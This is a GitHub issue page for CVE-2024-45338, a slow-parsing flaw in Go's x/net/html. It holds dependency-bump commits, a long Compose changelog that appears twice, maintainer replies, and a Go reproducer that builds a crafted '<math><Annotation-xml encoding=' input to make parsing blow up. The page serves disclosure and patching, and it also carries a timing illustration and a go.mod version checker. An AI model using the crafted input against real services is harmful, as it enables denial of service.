x/net/html: non-linear parsing of case-insensitive content #70906
Comments
Change https://go.dev/cl/637536 mentions this issue:
golang/go#70906 Signed-off-by: Guillaume Lours <705411+glours@users.noreply.github.com>
A high vulnerability (CVE-2024-45338) [1] is resolved in golang.org/x/net v0.33.0 [2]. Update to this version.

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-45338
[2] golang/go#70906

Signed-off-by: Brian Carey <bcarey@redhat.com>
*Issue #, if available:* golang/go#70906 *Description of changes:* This change updates the version of the net/html package provided by the Golang project. By submitting this pull request, I confirm that you can use, modify, copy, and redistribute this contribution, under the terms of your choice. Signed-off-by: Daniel Carl Jones <djonesoa@amazon.com>
Reference:
- [CVE-2024-45338](GHSA-w32m-9786-jp63)
- [x/net/html: non-linear parsing of case-insensitive content golang/go#70906](golang/go#70906)
The following reproducer prints the execution time of `html.Parse`:

```go
package main

import (
	"bytes"
	"fmt"
	"strings"
	"time"

	"golang.org/x/net/html"
)

// generate builds an input of roughly size bytes: a <math><Annotation-xml
// opening tag whose encoding= attribute carries a very long value, followed
// by many short tokens.
func generate(size int) []byte {
	size1 := size / 2
	size2 := size / 8
	out := []byte("<math><Annotation-xml encoding=")
	out = append(out, bytes.Repeat([]byte{0xFF}, size1)...)
	out = append(out, bytes.Repeat([]byte("><</"), size2)...)
	return out
}

func main() {
	// Double the input size each round; with linear parsing the time per
	// round should roughly double as well.
	for kb := 1; kb <= 1024; kb *= 2 {
		data := generate(1024 * kb)
		start := time.Now()
		html.Parse(strings.NewReader(string(data)))
		duration := time.Since(start)
		fmt.Printf("Parsing %d kb took %s\n", kb, duration)
	}
}
```

Output on AMD Ryzen 5 5600G, Linux x64 using go1.23.2 linux/amd64 (from https://go.dev/dl/go1.23.2.linux-amd64.tar.gz):
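The issue title and the reproducer point at a case-insensitive comparison that is re-run against one long attribute value for every later token. The following added example (not code from the issue or from x/net) models that complexity class with a constructed per-token check and an assumed keyword set, and shows why `strings.EqualFold` keeps the check linear in the number of tokens rather than in tokens times attribute length.

```go
package main

import (
	"fmt"
	"strings"
	"time"
)

// Constructed illustration of the complexity class behind the reproducer, not
// the x/net/html source: a parser holds one long attribute value and re-runs a
// case-insensitive comparison of that value on every subsequent token.
// Assumed shape of the check: "does this attribute value equal one of a few
// fixed ASCII keywords, ignoring case?"
var keywords = []string{"text/html", "application/xhtml+xml"} // assumed keyword set

// matchLower is the quadratic-prone form: strings.ToLower copies and scans the
// whole candidate before the comparison, so every call costs O(len(candidate))
// and allocates, even when the candidate is far longer than any keyword.
func matchLower(candidate string) bool {
	lower := strings.ToLower(candidate)
	for _, k := range keywords {
		if lower == k {
			return true
		}
	}
	return false
}

// matchFold is the linear form: strings.EqualFold walks both strings together
// and stops at the first mismatch or when the shorter operand is exhausted, so
// a long non-matching candidate is rejected after a handful of runes with no
// allocation.
func matchFold(candidate string) bool {
	for _, k := range keywords {
		if strings.EqualFold(candidate, k) {
			return true
		}
	}
	return false
}

// simulateParse stands in for the parser's main loop: attrVal is the value
// captured from one attribute, tokens is the number of later tokens that each
// trigger the check. It returns how many tokens matched and the wall time.
func simulateParse(attrVal string, tokens int, match func(string) bool) (int, time.Duration) {
	start := time.Now()
	hits := 0
	for i := 0; i < tokens; i++ {
		if match(attrVal) {
			hits++
		}
	}
	return hits, time.Since(start)
}

// compare runs both forms on a constructed attribute value of attrBytes
// uppercase 'A's (uppercase so ToLower cannot return its input unchanged and
// must copy) followed by tokens checks, and returns both timings. Work for
// matchLower grows with attrBytes*tokens; work for matchFold grows with tokens.
func compare(attrBytes, tokens int) (slow, fast time.Duration) {
	attr := strings.Repeat("A", attrBytes)
	_, slow = simulateParse(attr, tokens, matchLower)
	_, fast = simulateParse(attr, tokens, matchFold)
	return slow, fast
}

func main() {
	// Grow the attribute and the token count together, as the reproducer's
	// generate() does: the ToLower column grows quadratically, EqualFold linearly.
	for kb := 16; kb <= 64; kb *= 2 {
		tokens := kb * 64
		slow, fast := compare(kb*1024, tokens)
		fmt.Printf("attr %3d KiB, %5d tokens: ToLower %-12s EqualFold %s\n", kb, tokens, slow, fast)
	}
}
```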
No evidence that these CVEs were actually exploitable in any way, I believe they're false positives. The CVEs are:
- CVE-2024-51744 (github.com/golang-jwt/jwt/v4)
- CVE-2024-45338 (x/net)
- CVE-2024-45337 (x/crypto)

Trivy output before this PR:

Signed-off-by: Ashley Davis <ashley.davis@venafi.com>
…32.2 Bumping compose to version v2.26.1-287-gfa3950346, which comprises the following commits: fa3950346 image can be set to a local ID, that isn't a valid docker ref a35158502 can't render progress concurrently with buildkit b6db1380e exclude one-off container running convergence 2ebb47543 Only override service mac if set on the main network. d474515d4 remove engine v25 from e2e test matrix The 1st version available for Ubuntu 24.x is Docker Engine v26 2b21c5df9 fix relative path in compose file 1f3c10eb4 bump compose-go to v2.4.7 68ad165a5 replace tibdex/github-app-token by official GitHub create-github-app-token 3060ed279 bump golang.org/x/net to v0.33.0 to fix potential security issue golang/go#70906 be09b2e8c checkExpectedVolumes must ignore anonymous volumes 571a1af01 When retrying to resolveOrCreateNetwork, retry with a valid network name 8f644eea7 only check bind mount conflict if sync action is involved 56e92e34b use the 3 latest major versions of the engine to run e2e step a42a04dfe bump Golang version to v1.22.10 and update CI actions 34bcd03a7 add --pull to run command ed61e42f9 CI to validate fmt 65696bb1c `make fmt` so any contributor can enforce formatting 446e00520 format code with gofumpt c01c9c29f e2e test to prevent future regression 038c81f34 only check volume mounts for updated config a20b69ac5 e2e test for recreate volume 977530c22 build(deps): bump google.golang.org/grpc from 1.68.0 to 1.68.1 d4db8b6b1 build(deps): bump golang.org/x/crypto from 0.27.0 to 0.31.0 f8ce0f04e build(deps): bump golang.org/x/sys from 0.27.0 to 0.28.0 8e0520e71 prompt user to confirm volume recreation 332311358 Recreate container on volume configuration change df9e420dd introduce watch restart action 142f5dba8 bump otel dependencies to v1.28.0 and v0.53.0 to align with buildx, buildkit and engine versions 700c586bc bump docker/buildx to latest release fc566509d fix support for service.mac_address e73c2303f update xx to v1.6.1 for compatibility with alpine 3.21 and 
file 5.46+ 624303233 build(deps): bump golang.org/x/sync from 0.9.0 to 0.10.0 a1729c52d Update pkg/e2e/watch_test.go 254224c18 first watch action for a file event wins 0861e6845 fix af5b74850 revisit TestDebounceBatching 32a22c1f4 introduce sync+exec watch action e6ea8fb96 log configuration error as a watch log event 043465448 do not require a build section but for `rebuild` action 1d0839086 pull --quiet should not drop status message, only progress 69a83d130 use latest engine tags 781b9f1cd Bump buildx to 0.19.1 cbff0e555 be sure everything has been cleanup at the end of each tests e4222bff5 add local config.json to test configuration dir if exists 25197fe6d disable failing TestBuildSSH test 85cdaf9dd fix build with bake a8469db83 bump containerd to v1.7,24 08488dae5 bump google.golang.org/grpc to v1.68.0 cc3a216f2 build(deps): bump github.com/moby/buildkit from 0.17.1 to 0.17.2 6e818b9ae build(deps): bump github.com/compose-spec/compose-go/v2 6b3e57503 only stop dependent containers ... 
if there's some 8e497a128 disable TestNetworkConfigChanged which is unstable on CI 5aed70437 only check attached networks on running containers 1ff9b758d fix: commit tests 9eaba5597 feat: add commit command a85f8a40a run build tests against bake 095f65cb4 delegate build to buildx bake 208e57ded build(deps): bump github.com/stretchr/testify from 1.9.0 to 1.10.0 2d148faed use service.stop to stop dependent containers 43ac1e31c Update wait-timeout flag usage to include the unit 5561a778c go.mod: github.com/docker/cli v27.4.0-rc.2 ae48f488d go.mod: github.com/docker/docker v27.4.0-rc.2 5e3a09538 go.mod: github.com/docker/cli 8d1bacae3e49 (v27.4.0-rc.2-dev) a2a3eb72e go.mod: github.com/docker/cli v27.4.0-rc.1 3513b4242 go.mod: github.com/docker/docker v27.4.0-rc.1 d4fa63fdc Update pkg/compose/convergence.go c21d4cfb4 detect network config changes and recreate if needed 61f1d4f69 go.mod: github.com/docker/buildx v0.18.0 f7cce281d go.mod: github.com/moby/buildkit v0.17.1 bcaacc7f2 gha: test against docker engine v27.4.0 3f5898f8d push empty descriptor layer when using OCI version 1.1 for Compose artifact it fixes a repository creation issue when pushing the 1st time a Compose OCI artifact on the Hub 2bb67f270 remove ddev e2e tests bf521fe3a implement remove-orphans on run 11e9621da ci: enable testifylint linter a9de9abcf Emit events for building images 799ab842a Fix compose images that reutn a different image with the same ID 2f65ace2a remove obsolete containers first on scale down aa0a4189e pass stal bot inactivity limit from 6 to 3 months eba3ff8f3 fix(config): Print service names with --no-interpolate 6313365ba build(deps): bump golang.org/x/sys from 0.26.0 to 0.27.0 dbd51745c build(deps): bump golang.org/x/sync from 0.8.0 to 0.9.0 a8bfbc147 bump compose-go v2.4.4 fbbd6f83d Avoid starting all services on rebuild a00097898 remove ArtifactType from Config in OCI v1.1 definition of the artifact 361c0893a build(deps): bump github.com/compose-spec/compose-go/v2 513b6128c 
Service being declared in a profile must not trigger re-creation eececb9ad Add profile e2e test case to document in compose 501b5acde Update `MAINTAINERS` file f51bc4cd0 bump compose-go to version v2.4.2 517f87a37 bump google.golang.org/grpc to v1.67.1 718049cbd bump go.uber.org/mock to v0.5.0 02371f312 bump golang minimal version to 1.22 in go.mod a7c9de82b build(deps): bump github.com/containerd/containerd from 1.7.22 to 1.7.23 51ebeb544 introduce generate command as alpha command fafaa9c5b bump compose-go to version v2.4.1 fc9c3cde0 Add license header to dockerignore_test.go 73bfbab54 fix 2ac081b4c fix(dockerignore): Add wildcard support to dockerignore.go eeea049f1 push: Fix error message typo 26064d4b6 allow usage of -f flag with oci Compose artifact 7c46beb8a resurrect --all flag for cp to target oneoff container aa1ec4524 connect to external networks by name a4ee6ca7a don't warn about uid/gid not being supported while ... they are 5617eff0c bump compose-go to v2.4.0 fa24ab8e2 one-off container are not indexed, and must be ignored by exec --index command 0aad9595a don't use progress to render restart, which hides logs 813900180 compose-go clean volume target to avoid ambiguous comparisons 82417bd5b add support for bind.recursive 0cbb73c02 Improve error message to include expected network label 38e3d670a desktop: allow this client to be identified via user-agent 24c78728e bump compose-go to v2.3.0 9eeb2d315 convert gpus to DeviceRequests with implicit "gpu" capability 8da82c98e gha: set default permissions to "contents: read" 1a8c85548 Add security policy 15bd0b0c5 add support for raw env_file format 39d0f6477 build(deps): bump golang.org/x/sys from 0.25.0 to 0.26.0 3a95a0872 add support for CDI device request using `devices` f794c79eb Support Dockerfile-specific ignore-file with watch 407d82570 Remove feature flag integration with Docker Desktop for ComposeUI and ComposeNav 82b41b9eb introduce service hooks 6c06170eb pass device.options to engine 60c1311f6 
chore: remove errors depricated pkg 17add87e4 fix: validate-go-mod bf0418bac fix: lint b9d0c77cd feat: add export command bdb854561 fix(convergence): Serialize access to observed state 41df35c1f Remove bind options when creating a volume type 3ef5045a0 Bump docker v27.3.1 d9df7aab6 fix(push): Fix unexpected EOF on alpha publish c9d96b449 use compose-go version fixing extra_hosts unicity issue 1744b4576 Show watch error message and open DD only when w is pressed 87f457e7d add tests to down.go abcc91e2b fix(down): Fix down command if specified services are not running 8b9fe8984 After container restart register printer consumer 34b18194f check secret source exists, as bind mount would create target as a folder otherwise ce27dba52 wait for dependent service up to delay set by --wait-timeout d2b945613 append unix-style relative path when computing container target path 9c60fe67d revert commits link to mount API over bind changes c16df17e1 don't set propagation if target engine isn't linux 20404db12 build(deps): bump github.com/docker/docker v27.3.0-rc.2 f2ff7fd75 build(deps): bump github.com/docker/cli v27.3.0-rc.2 cb00aaad2 set propagation default e885bc084 Remove custom codeql workflow 73d3a25eb fix import 3524bcfad chore(watch): Add debug log when skipping service without build context 1076f1d9a stop dependent containers before recreating diverged service 16652ed26 Fixed possible `nil` pointer dereference c6a76b9bd bump github.com/docker/buildx v0.17.1 3a0e3ba7e build(deps): bump docker, docker/cli to v27.3.0-rc.1 86ef8e62c gha: test against docker engine v27.3.0 8bf0627ea show sync files only in debug level 2e1419168 chore(watch): Add changed files path/count to log 155f64182 build(deps): bump golang.org/x/sync from 0.7.0 to 0.8.0 8db0cba0a bump compose-go to version v2.2.0 a7424435b Restore compose v1 behavior to recreate containers when ran with -V d445ebba3 fix linting issues with golangci-lint 1.60.2 f592aad10 bump golang to version 1.22.7 ef46445ed bump 
dependencies versions, engine and cli v27.2.1 containerd v1.7.22 buildx v0.17.0 buildkit v0.16.0 150593298 build(deps): bump golang.org/x/sys from 0.22.0 to 0.25.0 524a97e55 Fix typos 1d608e033 Use logrus instead of direct output to stderr. 329ad7392 attach: close streams when done b633c5c3e Fix typo in pull.go e6ef8629a Allow combination of bind mounts and 'rebuild' watches d658fecc6 service hash must exlude depends_on f9c7a0cc0 prefer mount API over bind 6e172d6b8 docs: duplicate documentation for root cmd 98e261ba3 docs(wait): Fix wait command description 11c7a25ae allow to add empty line in the logs when nav menu activated 234036756 upgrade docker versions 9c03797f9 initial sync files that modified after image creation 485c0eba5 initial sync for root directory 69384a9a0 Removes redundant condition from toAPIBuildOptions in build.go 1601ead7b docs: Update docker compose kill usage ea4ccf639 Fix stop on file chane for sync-restart action b1850ea4d bump engine and cli to v27.1.1, buildx to v0.16.1 adba639e8 remove all dependabot update PRs for OTel dependencies d8518529c gp.mod: github.com/gofrs/flock v0.12.1 c79f15da9 go.mod: golang.org/x/sys v0.22.0 3f55382ff update to go1.21.12 44337d2bb Enhance JSON progress events with more fields. 
bc733508d bump compose-go v2.1.5 c422b5447 bump github.com/docker/cli v27.1.0 e74441c90 bump github.com/docker/docker v27.1.0 2bac32a46 bump github.com/containerd/containerd v1.7.20 f278400fb gha: add docker 27.1.0 4f9db4d3e fix(containers): fix sorting logic by adding secondary sorting for one-off containers 06bf339a4 fix: typos 231ea1005 update docs generation to avoid man pages generation 46679150d bump compose-go to v2.1.4, buildx to v0.16.0, containerd to v1.7.19 and buildx to v0.15.0 d3d378b92 restore setEnvWithDotEnv 163cdfd31 empty env variable with no value must be unset in container 25f85938b exclude unnecessary resources after services have been selected cacbca859 change time for stale bot ecac13f27 Remove debug mode and run twice a week 14793cc2e Add stale workflow 11d5ecdc7 update docs 9549a213b feat(watch): Add --prune option to docker-compose watch command da434013e Remove COMPOSE_MENU env from e2e tests ace69c96a Use rawjson for the build backend. 2db04c1e4 Set logging format to JSON. 8f7cd0048 Format errors as JSON when in JSON progress mode. 5a6e1a7e2 Pass 'plain' instead of 'json' to build backend 06545d066 Add JSON stream progress writer 075fd9345 go.mod: docker/cli, docker/docker v27.0.3 d062ad739 gha: test against docker v27.0.3 7cd5209cc go.mod: docker/cli, docker/docker v27.0.2 f79c28168 Remove `console.Terminal` check and use `IsTerminal` from `streams.Out` Signed-off-by: Bruce Ashfield <bruce.ashfield@gmail.com>
Service being declared in a profile must not trigger re-creation eececb9ad Add profile e2e test case to document in compose 501b5acde Update `MAINTAINERS` file f51bc4cd0 bump compose-go to version v2.4.2 517f87a37 bump google.golang.org/grpc to v1.67.1 718049cbd bump go.uber.org/mock to v0.5.0 02371f312 bump golang minimal version to 1.22 in go.mod a7c9de82b build(deps): bump github.com/containerd/containerd from 1.7.22 to 1.7.23 51ebeb544 introduce generate command as alpha command fafaa9c5b bump compose-go to version v2.4.1 fc9c3cde0 Add license header to dockerignore_test.go 73bfbab54 fix 2ac081b4c fix(dockerignore): Add wildcard support to dockerignore.go eeea049f1 push: Fix error message typo 26064d4b6 allow usage of -f flag with oci Compose artifact 7c46beb8a resurrect --all flag for cp to target oneoff container aa1ec4524 connect to external networks by name a4ee6ca7a don't warn about uid/gid not being supported while ... they are 5617eff0c bump compose-go to v2.4.0 fa24ab8e2 one-off container are not indexed, and must be ignored by exec --index command 0aad9595a don't use progress to render restart, which hides logs 813900180 compose-go clean volume target to avoid ambiguous comparisons 82417bd5b add support for bind.recursive 0cbb73c02 Improve error message to include expected network label 38e3d670a desktop: allow this client to be identified via user-agent 24c78728e bump compose-go to v2.3.0 9eeb2d315 convert gpus to DeviceRequests with implicit "gpu" capability 8da82c98e gha: set default permissions to "contents: read" 1a8c85548 Add security policy 15bd0b0c5 add support for raw env_file format 39d0f6477 build(deps): bump golang.org/x/sys from 0.25.0 to 0.26.0 3a95a0872 add support for CDI device request using `devices` f794c79eb Support Dockerfile-specific ignore-file with watch 407d82570 Remove feature flag integration with Docker Desktop for ComposeUI and ComposeNav 82b41b9eb introduce service hooks 6c06170eb pass device.options to engine 60c1311f6 
chore: remove errors depricated pkg 17add87e4 fix: validate-go-mod bf0418bac fix: lint b9d0c77cd feat: add export command bdb854561 fix(convergence): Serialize access to observed state 41df35c1f Remove bind options when creating a volume type 3ef5045a0 Bump docker v27.3.1 d9df7aab6 fix(push): Fix unexpected EOF on alpha publish c9d96b449 use compose-go version fixing extra_hosts unicity issue 1744b4576 Show watch error message and open DD only when w is pressed 87f457e7d add tests to down.go abcc91e2b fix(down): Fix down command if specified services are not running 8b9fe8984 After container restart register printer consumer 34b18194f check secret source exists, as bind mount would create target as a folder otherwise ce27dba52 wait for dependent service up to delay set by --wait-timeout d2b945613 append unix-style relative path when computing container target path 9c60fe67d revert commits link to mount API over bind changes c16df17e1 don't set propagation if target engine isn't linux 20404db12 build(deps): bump github.com/docker/docker v27.3.0-rc.2 f2ff7fd75 build(deps): bump github.com/docker/cli v27.3.0-rc.2 cb00aaad2 set propagation default e885bc084 Remove custom codeql workflow 73d3a25eb fix import 3524bcfad chore(watch): Add debug log when skipping service without build context 1076f1d9a stop dependent containers before recreating diverged service 16652ed26 Fixed possible `nil` pointer dereference c6a76b9bd bump github.com/docker/buildx v0.17.1 3a0e3ba7e build(deps): bump docker, docker/cli to v27.3.0-rc.1 86ef8e62c gha: test against docker engine v27.3.0 8bf0627ea show sync files only in debug level 2e1419168 chore(watch): Add changed files path/count to log 155f64182 build(deps): bump golang.org/x/sync from 0.7.0 to 0.8.0 8db0cba0a bump compose-go to version v2.2.0 a7424435b Restore compose v1 behavior to recreate containers when ran with -V d445ebba3 fix linting issues with golangci-lint 1.60.2 f592aad10 bump golang to version 1.22.7 ef46445ed bump 
dependencies versions, engine and cli v27.2.1 containerd v1.7.22 buildx v0.17.0 buildkit v0.16.0 150593298 build(deps): bump golang.org/x/sys from 0.22.0 to 0.25.0 524a97e55 Fix typos 1d608e033 Use logrus instead of direct output to stderr. 329ad7392 attach: close streams when done b633c5c3e Fix typo in pull.go e6ef8629a Allow combination of bind mounts and 'rebuild' watches d658fecc6 service hash must exlude depends_on f9c7a0cc0 prefer mount API over bind 6e172d6b8 docs: duplicate documentation for root cmd 98e261ba3 docs(wait): Fix wait command description 11c7a25ae allow to add empty line in the logs when nav menu activated 234036756 upgrade docker versions 9c03797f9 initial sync files that modified after image creation 485c0eba5 initial sync for root directory 69384a9a0 Removes redundant condition from toAPIBuildOptions in build.go 1601ead7b docs: Update docker compose kill usage ea4ccf639 Fix stop on file chane for sync-restart action b1850ea4d bump engine and cli to v27.1.1, buildx to v0.16.1 adba639e8 remove all dependabot update PRs for OTel dependencies d8518529c gp.mod: github.com/gofrs/flock v0.12.1 c79f15da9 go.mod: golang.org/x/sys v0.22.0 3f55382ff update to go1.21.12 44337d2bb Enhance JSON progress events with more fields. 
bc733508d bump compose-go v2.1.5 c422b5447 bump github.com/docker/cli v27.1.0 e74441c90 bump github.com/docker/docker v27.1.0 2bac32a46 bump github.com/containerd/containerd v1.7.20 f278400fb gha: add docker 27.1.0 4f9db4d3e fix(containers): fix sorting logic by adding secondary sorting for one-off containers 06bf339a4 fix: typos 231ea1005 update docs generation to avoid man pages generation 46679150d bump compose-go to v2.1.4, buildx to v0.16.0, containerd to v1.7.19 and buildx to v0.15.0 d3d378b92 restore setEnvWithDotEnv 163cdfd31 empty env variable with no value must be unset in container 25f85938b exclude unnecessary resources after services have been selected cacbca859 change time for stale bot ecac13f27 Remove debug mode and run twice a week 14793cc2e Add stale workflow 11d5ecdc7 update docs 9549a213b feat(watch): Add --prune option to docker-compose watch command da434013e Remove COMPOSE_MENU env from e2e tests ace69c96a Use rawjson for the build backend. 2db04c1e4 Set logging format to JSON. 8f7cd0048 Format errors as JSON when in JSON progress mode. 5a6e1a7e2 Pass 'plain' instead of 'json' to build backend 06545d066 Add JSON stream progress writer 075fd9345 go.mod: docker/cli, docker/docker v27.0.3 d062ad739 gha: test against docker v27.0.3 7cd5209cc go.mod: docker/cli, docker/docker v27.0.2 f79c28168 Remove `console.Terminal` check and use `IsTerminal` from `streams.Out` Signed-off-by: Bruce Ashfield <bruce.ashfield@gmail.com>
So when I look at the go/src/go.mod file in the latest release of Go, it still refers to the versions of net that are failing this CVE. Are there any plans to address this?
The Go standard library does not use the golang.org/x/net/html package, so there isn't anything to address. golang.org/x/net is there for other packages (dns, http, http2, idna, lif, nettest, route).
An attacker can craft an input to the Parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing.
Thanks to Guido Vranken for reporting this issue.
This is CVE-2024-45338.
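The remediation the linked commits apply is a dependency bump to golang.org/x/net v0.33.0. The following stdlib-only checker, added here as an example and not code from the Go project or from this issue, scans a go.mod for the pinned golang.org/x/net version and reports whether it predates that fixed release. The go.mod contents and the module path example.com/app are constructed for the demonstration.

```go
package main

import (
	"bufio"
	"strconv"
	"strings"
)

// FixedXNetVersion is the golang.org/x/net release the linked commits bump to for CVE-2024-45338.
const FixedXNetVersion = "v0.33.0"

// SampleGoMod is a constructed go.mod used as demonstration input; not from any real project.
const SampleGoMod = `module example.com/app
go 1.22
require (
	github.com/docker/cli v27.4.0-rc.2 // indirect
	golang.org/x/net v0.30.0
)
`

// parseSemver splits "vMAJOR.MINOR.PATCH[-prerelease]" into numeric parts and a pre-release tag.
func parseSemver(v string) (nums [3]int, pre string, ok bool) {
	v, pre, _ = strings.Cut(strings.TrimPrefix(v, "v"), "-")
	parts := strings.Split(v, ".")
	if len(parts) != 3 {
		return nums, "", false
	}
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil {
			return nums, "", false
		}
		nums[i] = n
	}
	return nums, pre, true
}

// OlderThan reports whether version a sorts before b under semver rules (v0.33.0-rc.1 sorts
// before v0.33.0). Unparsable versions, such as pseudo-versions, are never reported as older.
func OlderThan(a, b string) bool {
	an, ap, aok := parseSemver(a)
	bn, bp, bok := parseSemver(b)
	if !aok || !bok {
		return false
	}
	for i := range an {
		if an[i] != bn[i] {
			return an[i] < bn[i]
		}
	}
	return ap != bp && ap != "" && (bp == "" || ap < bp)
}

// XNetRequirement returns the golang.org/x/net version a go.mod requires ("" if absent).
func XNetRequirement(gomod string) string {
	inBlock := false
	sc := bufio.NewScanner(strings.NewReader(gomod))
	for sc.Scan() {
		line, _, _ := strings.Cut(strings.TrimSpace(sc.Text()), "//")
		line = strings.TrimSpace(line) // drops trailing "// indirect" comments
		if line == "require (" || line == ")" {
			inBlock = line == "require ("
			continue
		}
		f := strings.Fields(line)
		if !inBlock && len(f) == 3 && f[0] == "require" {
			f = f[1:] // single-line form: require <module> <version>
		}
		if len(f) == 2 && f[0] == "golang.org/x/net" {
			return f[1]
		}
	}
	return ""
}

// VulnerableXNet reports the pinned golang.org/x/net version and whether it predates the fix.
func VulnerableXNet(gomod string) (string, bool) {
	v := XNetRequirement(gomod)
	return v, v != "" && OlderThan(v, FixedXNetVersion)
}
```

Running it over a real project's go.mod flags only the direct pin; `go list -m golang.org/x/net` is the authoritative answer once module graph pruning and replace directives are taken into account.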